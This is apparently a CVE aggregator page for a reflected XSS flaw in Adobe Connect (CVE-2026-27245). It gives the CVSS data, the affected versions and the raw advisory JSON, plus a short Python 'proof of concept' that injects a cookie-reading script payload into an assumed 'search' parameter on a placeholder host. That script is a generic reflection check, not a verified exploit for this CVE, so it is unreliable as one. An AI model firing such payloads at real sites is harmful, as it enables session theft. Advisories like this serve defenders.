Security Vulnerability Report
中文
CVE-2026-27245 CVSS 9.3 CRITICAL

CVE-2026-27245

Published: 2026-04-14 18:16:56
Last Modified: 2026-04-28 15:40:01

Description

Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:connect:*:*:*:*:*:-:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:adobe:connect_desktop_application:*:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:adobe:connect_desktop_application:*:*:*:*:*:windows:*:* - VULNERABLE
Adobe Connect <= 2025.3
Adobe Connect <= 12.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_reflected_xss(target_url): # Malicious payload to test for XSS # Using a simple alert box as proof of concept payload = '<script>alert(document.cookie)</script>' # Construct the full URL with the injectable parameter # Assuming 'search' or similar parameter is vulnerable exploit_url = f'{target_url}?search={payload}' try: # Send the crafted request to the server response = requests.get(exploit_url, timeout=10) # Check if the payload is reflected unmodified in the response if payload in response.text: print(f'[+] Vulnerability Detected at: {exploit_url}') print('[+] The script was injected and reflected back to the client.') else: print('[-] Payload not reflected or sanitized.') except Exception as e: print(f'Error connecting to target: {e}') if __name__ == '__main__': # Replace with actual target endpoint target = 'http://adobe-connect-example.com/vulnerable_endpoint' check_reflected_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27245", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:55.890", "lastModified": "2026-04-28T15:40:01.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:connect:*:*:*:*:*:-:*:*", "versionEndExcluding": "12.11", "matchCriteriaId": "4A1D88E9-612C-49B1-8521-F2258D4D74CA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:connect_desktop_application:*:*:*:*:*:macos:*:*", "versionEndIncluding": "2025.3", "matchCriteriaId": "185BF6E9-82FC-45E0-A64E-03FB923F34AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:connect_desktop_application:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2025.9.15", "matchCriteriaId": "783AAAA9-E68B-43E3-86A3-5227E27392A5"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/connect/apsb26-37.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}